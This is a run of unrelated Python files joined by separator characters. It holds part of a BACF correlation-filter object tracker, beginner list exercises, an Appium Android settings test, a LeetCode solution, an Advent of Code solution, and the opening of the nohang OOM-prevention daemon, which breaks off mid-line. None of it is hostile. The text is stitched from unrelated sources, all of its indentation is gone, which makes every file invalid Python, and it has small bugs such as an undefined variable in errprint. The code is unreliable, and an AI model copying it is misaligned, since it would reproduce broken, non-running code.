self.crop_size=(int(round(self.crop_size[0]/self.feature_ratio)*self.feature_ratio),int(round(self.crop_size[1]/self.feature_ratio)*self.feature_ratio))
self.feature_map_sz=(self.crop_size[0]//self.feature_ratio,self.crop_size[1]//self.feature_ratio)
output_sigma=np.sqrt(np.floor(self.base_target_sz[0]/self.feature_ratio)*np.floor(self.base_target_sz[1]/self.feature_ratio))*self.output_sigma_factor
y=gaussian2d_rolled_labels(self.feature_map_sz, output_sigma)
self.yf=fft2(y)
if self.interpolate_response==1:
self.interp_sz=(self.feature_map_sz[0]*self.feature_ratio,self.feature_map_sz[1]*self.feature_ratio)
else:
self.interp_sz=(self.feature_map_sz[0],self.feature_map_sz[1])
self._window=cos_window(self.feature_map_sz)
if self.number_of_scales>0:
scale_exp=np.arange(-int(np.floor((self.number_of_scales-1)/2)),int(np.ceil((self.number_of_scales-1)/2))+1)
self.scale_factors=self.scale_step**scale_exp
self.min_scale_factor=self.scale_step**(np.ceil(np.log(max(5/self.crop_size[0],5/self.crop_size[1]))/np.log(self.scale_step)))
self.max_scale_factor=self.scale_step**(np.floor(np.log(min(first_frame.shape[0]/self.base_target_sz[1],
first_frame.shape[1]/self.base_target_sz[0]))/np.log(self.scale_step)))
if self.interpolate_response>=3:
self.ky=np.roll(np.arange(-int(np.floor((self.feature_map_sz[1]-1)/2)),int(np.ceil((self.feature_map_sz[1]-1)/2+1))),
-int(np.floor((self.feature_map_sz[1]-1)/2)))
self.kx=np.roll(np.arange(-int(np.floor((self.feature_map_sz[0]-1)/2)),int(np.ceil((self.feature_map_sz[0]-1)/2+1))),
-int(np.floor((self.feature_map_sz[0]-1)/2))).T
self.small_filter_sz=(int(np.floor(self.base_target_sz[0]/self.feature_ratio)),int(np.floor(self.base_target_sz[1]/self.feature_ratio)))
pixels=self.get_sub_window(first_frame,self._center,model_sz=self.crop_size,
scaled_sz=(int(np.round(self.crop_size[0]*self.current_scale_factor)),
int(np.round(self.crop_size[1]*self.current_scale_factor))))
feature=extract_hog_feature(pixels, cell_size=self.feature_ratio)
self.model_xf=fft2(self._window[:,:,None]*feature)
self.g_f=self.ADMM(self.model_xf)
def update(self,current_frame,vis=False):
x=None
for scale_ind in range(self.number_of_scales):
current_scale=self.current_scale_factor*self.scale_factors[scale_ind]
sub_window=self.get_sub_window(current_frame,self._center,model_sz=self.crop_size,
scaled_sz=(int(round(self.crop_size[0]*current_scale)),
int(round(self.crop_size[1]*current_scale))))
feature= extract_hog_feature(sub_window, self.cell_size)[:, :, :, np.newaxis]
if x is None:
x=feature
else:
x=np.concatenate((x,feature),axis=3)
xtf=fft2(x*self._window[:,:,None,None])
responsef=np.sum(np.conj(self.g_f)[:,:,:,None]*xtf,axis=2)
if self.interpolate_response==2:
self.interp_sz=(int(self.yf.shape[1]*self.feature_ratio*self.current_scale_factor),
int(self.yf.shape[0]*self.feature_ratio*self.current_scale_factor))
responsef_padded=self.resize_dft2(responsef,self.interp_sz)
response=np.real(ifft2(responsef_padded))
if self.interpolate_response==3:
raise ValueError
elif self.interpolate_response==4:
disp_row,disp_col,sind=self.resp_newton(response,responsef_padded,self.newton_iterations,
self.ky,self.kx,self.feature_map_sz)
if vis is True:
self.score=response[:,:,sind]
self.score = np.roll(self.score, int(np.floor(self.score.shape[0] / 2)), axis=0)
self.score = np.roll(self.score, int(np.floor(self.score.shape[1] / 2)), axis=1)
else:
row,col,sind=np.unravel_index(np.argmax(response,axis=None),response.shape)
if vis is True:
self.score=response[:,:,sind]
self.score = np.roll(self.score, int(np.floor(self.score.shape[0] / 2)), axis=0)
self.score = np.roll(self.score, int(np.floor(self.score.shape[1] / 2)), axis=1)
disp_row=(row-1+int(np.floor(self.interp_sz[1]-1)/2))%self.interp_sz[1]-int(np.floor((self.interp_sz[1]-1)/2))
disp_col = (col-1 + int(np.floor(self.interp_sz[0] - 1) / 2)) % self.interp_sz[0] - int(
np.floor((self.interp_sz[0] - 1) / 2))
if self.interpolate_response==0 or self.interpolate_response==3 or self.interpolate_response==4:
factor=self.feature_ratio*self.current_scale_factor*self.scale_factors[sind]
elif self.interpolate_response==1:
factor=self.current_scale_factor*self.scale_factors[sind]
elif self.interpolate_response==2:
factor=self.scale_factors[sind]
else:
raise ValueError
dx,dy=int(np.round(disp_col*factor)),int(np.round(disp_row*factor))
self.current_scale_factor=self.current_scale_factor*self.scale_factors[sind]
self.current_scale_factor=max(self.current_scale_factor,self.min_scale_factor)
self.current_scale_factor=min(self.current_scale_factor,self.max_scale_factor)
self._center=(self._center[0]+dx,self._center[1]+dy)
pixels=self.get_sub_window(current_frame,self._center,model_sz=self.crop_size,
scaled_sz=(int(round(self.crop_size[0]*self.current_scale_factor)),
int(round(self.crop_size[1]*self.current_scale_factor))))
feature=extract_hog_feature(pixels, cell_size=self.cell_size)
#feature=cv2.resize(pixels,self.feature_map_sz)/255-0.5
xf=fft2(feature*self._window[:,:,None])
self.model_xf=(1-self.interp_factor)*self.model_xf+self.interp_factor*xf
self.g_f = self.ADMM(self.model_xf)
target_sz=(self.target_sz[0]*self.current_scale_factor,self.target_sz[1]*self.current_scale_factor)
return [self._center[0]-target_sz[0]/2,self._center[1]-target_sz[1]/2,target_sz[0],target_sz[1]]
def get_subwindow_no_window(self,img,pos,sz):
h,w=sz[1],sz[0]
xs = (np.floor(pos[0]) + np.arange(w) - np.floor(w / 2)).astype(np.int64)
ys = (np.floor(pos[1]) + np.arange(h) - np.floor(h / 2)).astype(np.int64)
xs[xs < 0] = 0
ys[ys < 0] = 0
xs[xs >= img.shape[1]] = img.shape[1] - 1
ys[ys >= img.shape[0]] = img.shape[0] - 1
out = img[ys, :][:, xs]
xs,ys=np.meshgrid(xs,ys)
return xs,ys,out
def ADMM(self,xf):
g_f = np.zeros_like(xf)
h_f = np.zeros_like(g_f)
l_f = np.zeros_like(g_f)
mu = 1
beta = 10
mumax = 10000
i = 1
T = self.feature_map_sz[0] * self.feature_map_sz[1]
S_xx = np.sum(np.conj(xf) * xf, 2)
while i <= self.admm_iterations:
B = S_xx + (T * mu)
S_lx = np.sum(np.conj(xf) * l_f, axis=2)
S_hx = np.sum(np.conj(xf) * h_f, axis=2)
tmp0 = (1 / (T * mu) * (self.yf[:, :, None] * xf)) - ((1 / mu) * l_f)+ h_f
tmp1 = 1 / (T * mu) * (xf * ((S_xx * self.yf)[:, :, None]))
tmp2 = 1 / mu * (xf * (S_lx[:, :, None]))
tmp3 = xf * S_hx[:, :, None]
# solve for g
g_f = tmp0 - (tmp1 - tmp2 + tmp3) / B[:, :, None]
# solve for h
h = (T / ((mu * T) + self.admm_lambda)) * ifft2(mu * g_f + l_f)
xs, ys, h = self.get_subwindow_no_window(h,
(int(self.feature_map_sz[0] / 2), int(self.feature_map_sz[1] / 2)),
self.small_filter_sz)
t = np.zeros((self.feature_map_sz[1], self.feature_map_sz[0], h.shape[2]),dtype=np.complex64)
t[ys,xs,:] = h
h_f = fft2(t)
l_f = l_f + (mu * (g_f - h_f))
mu = min(beta * mu, mumax)
i += 1
return g_f
def get_sub_window(self, img, center, model_sz, scaled_sz=None):
model_sz = (int(model_sz[0]), int(model_sz[1]))
if scaled_sz is None:
sz = model_sz
else:
sz = scaled_sz
sz = (max(int(sz[0]), 2), max(int(sz[1]), 2))
im_patch = cv2.getRectSubPix(img, sz, center)
if scaled_sz is not None:
im_patch = self.mex_resize(im_patch, model_sz)
return im_patch.astype(np.uint8)
def resize_dft2(self, input_dft, desired_sz):
h,w,num_imgs=input_dft.shape
if desired_sz[0]!=w or desired_sz[1]!=h:
minsz=(int(min(w, desired_sz[0])), int(min(h, desired_sz[1])))
scaling=(desired_sz[0]*desired_sz[1]/(h*w))
resized_dfft=np.zeros((desired_sz[1],desired_sz[0],num_imgs),dtype=np.complex64)
mids=(int(np.ceil(minsz[0]/2)),int(np.ceil(minsz[1]/2)))
mide=(int(np.floor((minsz[0]-1)/2))-1,int(np.floor((minsz[1]-1)/2))-1)
resized_dfft[:mids[1],:mids[0],:]=scaling*input_dft[:mids[1],:mids[0],:]
resized_dfft[:mids[1],-1-mide[0]:,:]=scaling*input_dft[:mids[1],-1-mide[0]:,:]
resized_dfft[-1-mide[1]:,:mids[0],:]=scaling*input_dft[-1-mide[1]:,:mids[0],:]
resized_dfft[-1-mide[1]:,-1-mide[0]:,:]=scaling*input_dft[-1-mide[1]:,-1-mide[0]:,:]
return resized_dfft
else:
return input_dft
def mex_resize(self, img, sz,method='auto'):
sz = (int(sz[0]), int(sz[1]))
src_sz = (img.shape[1], img.shape[0])
if method=='antialias':
interpolation=cv2.INTER_AREA
elif method=='linear':
interpolation=cv2.INTER_LINEAR
else:
if sz[1] > src_sz[1]:
interpolation = cv2.INTER_LINEAR
else:
interpolation = cv2.INTER_AREA
img = cv2.resize(img, sz, interpolation=interpolation)
return img
"""
I didn't know how to convert matlab function mtimesx to numpy
Just finetune from 4kubo's implementation
https://github.com/4kubo/bacf_python/blob/master/special_operation/resp_newton.py
"""
def resp_newton(self,response, responsef, iterations, ky, kx, use_sz):
n_scale = response.shape[2]
index_max_in_row = np.argmax(response, 0)
max_resp_in_row = np.max(response, 0)
index_max_in_col = np.argmax(max_resp_in_row, 0)
init_max_response = np.max(max_resp_in_row, 0)
col = index_max_in_col.flatten(order="F")
max_row_perm = index_max_in_row
row = max_row_perm[col, np.arange(n_scale)]
trans_row = (row - 1 + np.floor((use_sz[1] - 1) / 2)) % use_sz[1] \
- np.floor((use_sz[1] - 1) / 2) + 1
trans_col = (col - 1 + np.floor((use_sz[0] - 1) / 2)) % use_sz[0] \
- np.floor((use_sz[0] - 1) / 2) + 1
init_pos_y = np.reshape(2 * np.pi * trans_row / use_sz[1], (1, 1, n_scale))
init_pos_x = np.reshape(2 * np.pi * trans_col / use_sz[0], (1, 1, n_scale))
max_pos_y = init_pos_y
max_pos_x = init_pos_x
# pre-compute complex exponential
iky = 1j * ky
exp_iky = np.tile(iky[np.newaxis, :, np.newaxis], (1, 1, n_scale)) * \
np.tile(max_pos_y, (1, ky.shape[0], 1))
exp_iky = np.exp(exp_iky)
ikx = 1j * kx
exp_ikx = np.tile(ikx[:, np.newaxis, np.newaxis], (1, 1, n_scale)) * \
np.tile(max_pos_x, (kx.shape[0], 1, 1))
exp_ikx = np.exp(exp_ikx)
# gradient_step_size = gradient_step_size / prod(use_sz)
ky2 = ky * ky
kx2 = kx * kx
iter = 1
while iter <= iterations:
# Compute gradient
ky_exp_ky = np.tile(ky[np.newaxis, :, np.newaxis], (1, 1, exp_iky.shape[2])) * exp_iky
kx_exp_kx = np.tile(kx[:, np.newaxis, np.newaxis], (1, 1, exp_ikx.shape[2])) * exp_ikx
y_resp = np.einsum('ilk,ljk->ijk', exp_iky, responsef)
resp_x = np.einsum('ilk,ljk->ijk', responsef, exp_ikx)
grad_y = -np.imag(np.einsum('ilk,ljk->ijk', ky_exp_ky, resp_x))
grad_x = -np.imag(np.einsum('ilk,ljk->ijk', y_resp, kx_exp_kx))
ival = 1j * np.einsum('ilk,ljk->ijk', exp_iky, resp_x)
H_yy = np.tile(ky2[np.newaxis, :, np.newaxis], (1, 1, n_scale)) * exp_iky
H_yy = np.real(-np.einsum('ilk,ljk->ijk', H_yy, resp_x) + ival)
H_xx = np.tile(kx2[:, np.newaxis, np.newaxis], (1, 1, n_scale)) * exp_ikx
H_xx = np.real(-np.einsum('ilk,ljk->ijk', y_resp, H_xx) + ival)
H_xy = np.real(-np.einsum('ilk,ljk->ijk', ky_exp_ky, np.einsum('ilk,ljk->ijk', responsef, kx_exp_kx)))
det_H = H_yy * H_xx - H_xy * H_xy
# Compute new position using newtons method
diff_y = (H_xx * grad_y - H_xy * grad_x) / det_H
diff_x = (H_yy * grad_x - H_xy * grad_y) / det_H
max_pos_y = max_pos_y - diff_y
max_pos_x = max_pos_x - diff_x
# Evaluate maximum
exp_iky = np.tile(iky[np.newaxis, :, np.newaxis], (1, 1, n_scale)) * \
np.tile(max_pos_y, (1, ky.shape[0], 1))
exp_iky = np.exp(exp_iky)
exp_ikx = np.tile(ikx[:, np.newaxis, np.newaxis], (1, 1, n_scale)) * \
np.tile(max_pos_x, (kx.shape[0], 1, 1))
exp_ikx = np.exp(exp_ikx)
iter = iter + 1
max_response = 1 / np.prod(use_sz) * \
np.real(np.einsum('ilk,ljk->ijk',
np.einsum('ilk,ljk->ijk', exp_iky, responsef),
exp_ikx))
# check for scales that have not increased in score
ind = max_response < init_max_response
max_response[0, 0, ind.flatten()] = init_max_response[ind.flatten()]
max_pos_y[0, 0, ind.flatten()] = init_pos_y[0, 0, ind.flatten()]
max_pos_x[0, 0, ind.flatten()] = init_pos_x[0, 0, ind.flatten()]
sind = int(np.nanargmax(max_response, 2))
disp_row = (np.mod(max_pos_y[0, 0, sind] + np.pi, 2 * np.pi) - np.pi) / (2 * np.pi) * use_sz[1]
disp_col = (np.mod(max_pos_x[0, 0, sind] + np.pi, 2 * np.pi) - np.pi) / (2 * np.pi) * use_sz[0]
return disp_row, disp_col, sind
|
# 4-1
print('4-1')
pizzas = ["cheese", "pepperoni", "anchovies", "mushroom"]
for topping in pizzas:
print('I love ' + topping + ' on my pizza.')
print('I really love pizza!')
print("\r")
# 4-2
print('4-2')
animals = ['dogs', 'cats', 'frogs', 'rabbits', 'moles', 'capybaras', 'birds']
for animal in animals:
print('A ' + animal.replace(animal[-1],'') + ' would make a great pet!')
print('All of these animals have four legs!')
print("\r")
# 4-3
print('4-3')
for number in range(1,21):
print(number, end = ' ')
print("\n")
# 4-6
print("4-6")
for number in range(1,21,2):
print(number, end = ' ')
print("\n")
# 4-7
print("4-7")
list = [number for number in range(3,31,3)]
print(list)
print("\r")
# 4-8
print("4-8")
tencubes = []
for value in range(1,11):
tencubes.append(value**3)
print(tencubes)
print("\r")
# 4-9
print("4-9")
cubelist = [cube**3 for cube in range(1,11)]
print(cubelist)
print("\r")
# 4-10
print("4-10")
print('The first three items on the list of animals are:')
print(animals[:3])
print('\nThe middle three items on the list of animals are:')
print(animals[2:6])
print('\nThe last three items on the list of animals are:')
print(animals[-3:])
print("\r")
# 4-11
print("4-11")
my_foods = ['pizza', 'falafel', 'carrot cake', 'curry']
friends_foods = my_foods[:]
my_foods.append('steak')
friends_foods.append('chutney')
print(my_foods)
print(friends_foods)
print("\r")
# 4-12
print("4-11")
for food in my_foods:
print(food + ' ', end = ' ')
print('\r')
for food in friends_foods:
print(food + ' ', end = ' ')
|
from appium import webdriver
import pytest
from Page_Object_Pro.Page.search import Search_Page
from Page_Object_Pro.Base.base import Base
class Test_Searchx:
def setup_class(self):
desired_caps = {}
desired_caps['platformName'] = 'Android'
desired_caps['platformVersion'] = '8.0.0'
desired_caps['deviceName'] = 'A5RNW18208010252'
desired_caps['appPackage'] = 'com.android.settings'
desired_caps['appActivity'] = '.HWSettings'
self.driver = webdriver.Remote("http://127.0.0.1:4723/wd/hub", desired_caps)
self.search_obj=Search_Page(self.driver)
self.searchs_obj = Base(self.driver)
def teardown_class(self):
self.driver.quit()
def test_search01(self):
self.search_obj.click_search()
@pytest.mark.parametrize("text",[1,2,3])
def test_search02(self,text):
self.search_obj.search_input(text)
def test_search03(self):
self.search_obj.click_return()
if __name__ == '__main__':
pytest.main() |
# Given an array of unique integers salary where salary[i] is the salary
# of the employee i.
#
# Return the average salary of employees excluding the
# minimum and maximum salary.
class Solution:
def average(self, salary):
return sum(sorted(salary)[1:len(salary)-1]) / (len(salary) - 2)
if __name__ == "__main__":
testinput = [4000, 3000, 1000, 2000]
print(Solution.average(Solution, testinput))
|
# @see https://adventofcode.com/2015/day/10
import re
data = '1113122113'
def step(n: str):
m = re.findall(r'([1]+|[2]+|[3]+|[4]+|[5]+|[6]+|[7]+|[8]+|[9]+|[0]+)', n)
nxt = ''
for s in m:
nxt += str(len(s)) + s[0]
return nxt
def seq(d: str, steps: int):
for _ in range(steps):
d = step(d)
return d
print('------------ PART 01 -------------')
num = seq(data, 40)
print('The length of the result after 40 steps:', len(num))
print('\n------------ PART 02 -------------')
num = seq(num, 10)
print('The length of the result after 50 steps:', len(num)) |
#!/usr/bin/env python3
"""A daemon that prevents OOM in Linux systems."""
import os
from ctypes import CDLL
from time import sleep, monotonic, process_time
from operator import itemgetter
from sys import stdout, stderr, argv, exit
from re import search
from sre_constants import error as invalid_re
from signal import signal, SIGKILL, SIGTERM, SIGINT, SIGQUIT, SIGHUP
###########################################################################################################################
###########################################################################################################################
# 1 До цикла
def find_cgroup_indexes():
""" Find cgroup-line positions in /proc/*/cgroup file.
"""
cgroup_systemd_index = cgroup_unified_index = None
with open('/proc/self/cgroup') as f:
for index, line in enumerate(f):
if ':name=systemd:' in line:
cgroup_systemd_index = index
if line.startswith('0::'):
cgroup_unified_index = index
(cgroup_systemd_mountpoint, cgroup_unified_mountpoint
) = find_cgroup_mountpoints()
if (cgroup_systemd_mountpoint is None and
cgroup_unified_mountpoint is not None):
if os.path.exists('{}/system.slice'.format(cgroup_unified_mountpoint)):
cgroup_systemd_index = cgroup_unified_index
return cgroup_systemd_index, cgroup_unified_index
def find_cgroup_mountpoints():
"""
"""
mounts = '/proc/mounts'
cgroup_systemd_marker = ',name=systemd 0 0'
cgroup_systemd_separator = ' cgroup rw,'
cgroup_unified_separator = ' cgroup2 rw,'
cgroup_unified_mountpoint = cgroup_systemd_mountpoint = None
with open(mounts) as f:
for line in f:
if cgroup_systemd_marker in line:
cgroup_systemd_mountpoint = line.partition(
cgroup_systemd_separator)[0].partition(' ')[2]
continue
if cgroup_unified_separator in line:
cgroup_unified_mountpoint = line.partition(
cgroup_unified_separator)[0].partition(' ')[2]
if not os.path.exists('{}/system.slice'.format(cgroup_systemd_mountpoint)):
cgroup_systemd_mountpoint = None
return cgroup_systemd_mountpoint, cgroup_unified_mountpoint
def get_pid_list():
"""
Find pid list expect kthreads and zombies
"""
pid_list = []
for pid in os.listdir('/proc'):
if os.path.exists('/proc/' + pid + '/exe'):
pid_list.append(pid)
return pid_list
def get_non_decimal_pids():
"""
"""
non_decimal_list = []
for pid in pid_list:
if pid[0].isdecimal() is False:
non_decimal_list.append(pid)
return non_decimal_list
def log(*msg):
"""
"""
print(*msg)
if separate_log:
logging.info(*msg)
def conf_parse_bool(param):
"""
Get bool parameters from the config_dict.
param: config_dicst key
returns bool
"""
if param in config_dict:
param_str = config_dict[param]
if param_str == 'True':
return True
elif param_str == 'False':
return False
else:
errprint('Invalid value of the "{}" parameter.'.format(param))
errprint('Valid values are True and False.')
errprint('Exit')
exit(1)
else:
errprint('All the necessary parameters must be in the config')
errprint('There is no "{}" parameter in the config'.format(param))
exit(1)
def calculate_percent(arg_key):
"""
parse conf dict
Calculate mem_min_KEY_percent.
Try use this one)
arg_key: str key for config_dict
returns int mem_min_percent or NoneType if got some error
"""
if arg_key in config_dict:
mem_min = config_dict[arg_key]
if mem_min.endswith('%'):
# truncate percents, so we have a number
mem_min_percent = mem_min[:-1].strip()
# then 'float test'
mem_min_percent = string_to_float_convert_test(mem_min_percent)
if mem_min_percent is None:
errprint('Invalid {} value, not float\nExit'.format(arg_key))
exit(1)
# Final validations...
if mem_min_percent < 0 or mem_min_percent > 100:
errprint(
'{}, as percents value, out of ran'
'ge [0; 100]\nExit'.format(arg_key))
exit(1)
# soft_threshold_min_mem_percent is clean and valid float percentage. Can
# translate into Kb
mem_min_kb = mem_min_percent / 100 * mem_total
mem_min_mb = round(mem_min_kb / 1024)
elif mem_min.endswith('M'):
mem_min_mb = string_to_float_convert_test(mem_min[:-1].strip())
if mem_min_mb is None:
errprint('Invalid {} value, not float\nExit'.format(arg_key))
exit(1)
mem_min_kb = mem_min_mb * 1024
if mem_min_kb > mem_total:
errprint(
'{} value can not be greater then MemT'
'otal ({} MiB)\nExit'.format(
arg_key, round(
mem_total / 1024)))
exit(1)
mem_min_percent = mem_min_kb / mem_total * 100
else:
log('Invalid {} units in config.\n Exit'.format(arg_key))
exit(1)
mem_min_percent = None
else:
log('{} not in config\nExit'.format(arg_key))
exit(1)
mem_min_percent = None
return mem_min_kb, mem_min_mb, mem_min_percent
def string_to_float_convert_test(string):
"""Try to interprete string values as floats."""
try:
return float(string)
except ValueError:
return None
def string_to_int_convert_test(string):
"""Try to interpret string values as integers."""
try:
return int(string)
except ValueError:
return None
def errprint(*text):
"""
"""
print(*text, file=stderr, flush=True)
try:
if separate_log:
logging.info(*msg)
except NameError:
pass
def get_swap_threshold_tuple(string):
# re (Num %, True) or (Num KiB, False)
"""Returns KiB value if abs val was set in config, or tuple with %"""
# return tuple with abs and bool: (abs %, True) or (abs MiB, False)
if string.endswith('%'):
valid = string_to_float_convert_test(string[:-1])
if valid is None:
errprint('somewhere swap unit is not float_%')
exit(1)
value = float(string[:-1].strip())
if value < 0 or value > 100:
errprint('invalid value, must be from the range[0; 100] %')
exit(1)
return value, True
elif string.endswith('M'):
valid = string_to_float_convert_test(string[:-1])
if valid is None:
errprint('somewhere swap unit is not float_M')
exit(1)
value = float(string[:-1].strip()) * 1024
if value < 0:
errprint('invalid unit in config (negative value)')
exit(1)
return value, False
else:
errprint(
'Invalid config file. There are invalid units somewhere\nExit')
exit(1)
def mlockall():
"""Lock all memory to prevent swapping nohang process."""
MCL_CURRENT = 1
MCL_FUTURE = 2
MCL_ONFAULT = 4
libc = CDLL('libc.so.6', use_errno=True)
result = libc.mlockall(
MCL_CURRENT | MCL_FUTURE | MCL_ONFAULT
)
if result != 0:
result = libc.mlockall(
MCL_CURRENT | MCL_FUTURE
)
if result != 0:
log('WARNING: cannot lock all memory')
else:
pass
# log('All memory locked with MCL_CURRENT | MCL_FUTURE')
else:
pass
# log('All memory locked with MCL_CURRENT | MCL_FUTURE | MCL_ONFAULT')
def signal_handler(signum, frame):
"""
"""
for i in sig_list:
signal(i, signal_handler_inner)
log('Signal handler called with the {} signal '.format(
sig_dict[signum]))
update_stat_dict_and_print(None)
m1 = monotonic()
pt1 = process_time()
x = (pt1 - pt0) / (m1 - m0) * 100
log('CPU usage by nohang since it started: {}%'.format(round(x, 3)))
log('Exit')
exit()
def signal_handler_inner(signum, frame):
"""
"""
log('Signal handler called with the {} signal (ignored) '.format(
sig_dict[signum]))
def valid_re(reg_exp):
"""Validate regular expression.
"""
try:
search(reg_exp, '')
except invalid_re:
log('Invalid config: invalid regexp: {}'.format(reg_exp))
exit(1)
def check_config():
"""
"""
log('#' * 79)
log('\n1. Common zram settings')
log(' zram_checking_enabled: {}'.format(zram_checking_enabled))
log('\n2. Common PSI settings')
log(' psi_checking_enabled: {}'.format(psi_checking_enabled))
log(' psi_path: {}'.format(psi_path))
log(' psi_metrics: {}'.format(psi_metrics))
log(' psi_excess_duration: {} sec'.format(psi_excess_duration))
log(' psi_post_action_delay: {} sec'.format(psi_post_action_delay))
log('\n3. Poll rate')
log(' fill_rate_mem: {}'.format(fill_rate_mem))
log(' fill_rate_swap: {}'.format(fill_rate_swap))
log(' fill_rate_zram: {}'.format(fill_rate_zram))
log(' max_sleep: {} sec'.format(max_sleep))
log(' min_sleep: {} sec'.format(min_sleep))
log(' over_sleep: {} sec'.format(over_sleep))
log('\n4. Warnings and notifications')
log(' post_action_gui_notifications: {}'.format(
post_action_gui_notifications))
log(' low_memory_warnings_enabled: {}'.format(
low_memory_warnings_enabled))
log(' warning_exe: {}'.format(warning_exe))
log(' warning_threshold_min_mem: {} MiB, {} %'.format(round(
warning_threshold_min_mem_mb), round(
warning_threshold_min_mem_percent, 1)))
log(' warning_threshold_min_swap: {}'.format
(warning_threshold_min_swap))
log(' warning_threshold_max_zram: {} MiB, {} %'.format(round(
warning_threshold_max_zram_mb), round(
warning_threshold_max_zram_percent, 1)))
log(' warning_threshold_max_psi: {}'.format(
warning_threshold_max_psi))
log(' min_post_warning_delay: {} sec'.format(
min_post_warning_delay))
log(' env_cache_time: {}'.format(env_cache_time))
log('\n5. Soft threshold')
log(' soft_threshold_min_mem: {} MiB, {} %'.format(
round(soft_threshold_min_mem_mb), round(
soft_threshold_min_mem_percent, 1)))
log(' soft_threshold_min_swap: {}'.format(soft_threshold_min_swap))
log(' soft_threshold_max_zram: {} MiB, {} %'.format(
round(soft_threshold_max_zram_mb), round(
soft_threshold_max_zram_percent, 1)))
log(' soft_threshold_max_psi: {}'.format(soft_threshold_max_psi))
log('\n6. Hard threshold')
log(' hard_threshold_min_mem: {} MiB, {} %'.format(
round(hard_threshold_min_mem_mb), round(
hard_threshold_min_mem_percent, 1)))
log(' hard_threshold_min_swap: {}'.format(hard_threshold_min_swap))
log(' hard_threshold_max_zram: {} MiB, {} %'.format(
round(hard_threshold_max_zram_mb), round(
hard_threshold_max_zram_percent, 1)))
log(' hard_threshold_max_psi: {}'.format(hard_threshold_max_psi))
log('\n7. Customize victim selection: adjusting badness of processes')
log('\n7.1. Ignore positive oom_score_adj')
log(' ignore_positive_oom_score_adj: {}'.format(
ignore_positive_oom_score_adj))
log('\n7.3. ')
log('7.3.1. Matching process names with RE patterns')
if len(badness_adj_re_name_list) > 0:
log(' regexp: badness_adj:')
for i in badness_adj_re_name_list:
log(' {} {}'.format(i[1], i[0]))
else:
log(' (not set)')
log('7.3.2. Matching CGroup_systemd-line with RE patterns')
if len(badness_adj_re_cgroup_systemd_list) > 0:
log(' regexp: badness_adj:')
for i in badness_adj_re_cgroup_systemd_list:
log(' {} {}'.format(i[1], i[0]))
else:
log(' (not set)')
log('7.3.3. Matching CGroup_unified-line with RE patterns')
if len(badness_adj_re_cgroup_unified_list) > 0:
log(' regexp: badness_adj:')
for i in badness_adj_re_cgroup_unified_list:
log(' {} {}'.format(i[1], i[0]))
else:
log(' (not set)')
log('7.3.4. Matching eUIDs with RE patterns')
if len(badness_adj_re_uid_list) > 0:
log(' regexp: badness_adj:')
for i in badness_adj_re_uid_list:
log(' {} {}'.format(i[1], i[0]))
else:
log(' (not set)')
log('7.3.5. Matching realpath with RE patterns')
if len(badness_adj_re_realpath_list) > 0:
log(' regexp: badness_adj:')
for i in badness_adj_re_realpath_list:
log(' {} {}'.format(i[1], i[0]))
else:
log(' (not set)')
log('7.3.5.1. Matching cwd with RE patterns')
if len(badness_adj_re_cwd_list) > 0:
log(' regexp: badness_adj:')
for i in badness_adj_re_cwd_list:
log(' {} {}'.format(i[1], i[0]))
else:
log(' (not set)')
log('7.3.6. Matching cmdlines with RE patterns')
if len(badness_adj_re_cmdline_list) > 0:
log(' regexp: badness_adj:')
for i in badness_adj_re_cmdline_list:
log(' {} {}'.format(i[1], i[0]))
else:
log(' (not set)')
log('7.3.7. Matching environ with RE patterns')
if len(badness_adj_re_environ_list) > 0:
log(' regexp: badness_adj:')
for i in badness_adj_re_environ_list:
log(' {} {}'.format(i[1], i[0]))
else:
log(' (not set)')
log('\n8. Customize corrective actions')
if len(soft_actions_list) > 0:
log(' Match by: regexp: command: ')
for i in soft_actions_list:
log(' {} {} {}'.format(i[0], i[1], i[2]))
else:
log(' (not set)')
log('\n9. Misc')
log(' max_soft_exit_time: {} sec'.format(max_soft_exit_time))
log(' min_badness: {}'.format(min_badness))
log(' post_soft_action_delay: {} sec'.format(
post_soft_action_delay))
log(' post_zombie_delay: {} sec'.format(post_zombie_delay))
log(' victim_cache_time: {} sec'.format(victim_cache_time))
log(' exe_timeout: {} sec'.format(exe_timeout))
log('\n10. Verbosity')
log(' print_config_at_startup: {}'.format(print_config_at_startup))
log(' print_mem_check_results: {}'.format(print_mem_check_results))
log(' min_mem_report_interval: {} sec'.format(
min_mem_report_interval))
log(' print_proc_table: {}'.format(print_proc_table))
log(' extra_table_info: {}'.format(extra_table_info))
log(' print_victim_status: {}'.format(print_victim_status))
log(' print_victim_cmdline: {}'.format(print_victim_cmdline))
log(' max_victim_ancestry_depth: {}'.format(max_victim_ancestry_depth))
log(' print_statistics: {}'.format(print_statistics))
log(' debug_gui_notifications: {}'.format(debug_gui_notifications))
log(' debug_psi: {}'.format(debug_psi))
log(' debug_sleep: {}'.format(debug_sleep))
log(' debug_threading: {}'.format(debug_threading))
log(' separate_log: {}'.format(separate_log))
log('#' * 79)
if check_config_flag:
log('config is OK')
exit()
def print_version():
"""
"""
try:
v = rline1('/etc/nohang/version')
except FileNotFoundError:
v = None
if v is None:
print('nohang unknown version')
else:
print('nohang ' + v)
exit()
def rline1(path):
"""read 1st line from path."""
try:
with open(path) as f:
for line in f:
return line.rstrip()
except UnicodeDecodeError:
with open(path, 'rb') as f:
return f.read(999).decode(
'utf-8', 'ignore').split('\n')[0] # use partition()!
def update_stat_dict_and_print(key):
"""
"""
if key is not None:
if key not in stat_dict:
stat_dict.update({key: 1})
else:
new_value = stat_dict[key] + 1
stat_dict.update({key: new_value})
if print_statistics:
stats_msg = 'Total stat (what happened in the last {}):'.format(
format_time(monotonic() - start_time))
for i in stat_dict:
stats_msg += '\n {}: {}'.format(i, stat_dict[i])
log(stats_msg)
def format_time(t):
"""
"""
t = int(t)
if t < 60:
return '{} sec'.format(t)
if t > 3600:
h = t // 3600
s0 = t - h * 3600
m = s0 // 60
s = s0 % 60
return '{} h {} min {} sec'.format(h, m, s)
m = t // 60
s = t % 60
return '{} min {} sec'.format(m, s)
def func_print_proc_table():
"""
"""
print_proc_table = True
find_victim(print_proc_table)
exit()
###########################################################################################################################
###########################################################################################################################
# 2 В цикле
def check_mem_swap_exceeded():
"""
Check: is mem and swap threshold exceeded?
Return: None, (SIGTERM, meminfo), (SIGKILL, meminfo)
"""
mem_available, swap_total, swap_free = check_mem_and_swap()
# if hard_threshold_min_swap is set in percent
if swap_kill_is_percent:
hard_threshold_min_swap_kb = swap_total * \
hard_threshold_min_swap_percent / 100.0
else:
hard_threshold_min_swap_kb = swap_kb_dict['hard_threshold_min_swap_kb']
if swap_term_is_percent:
soft_threshold_min_swap_kb = swap_total * \
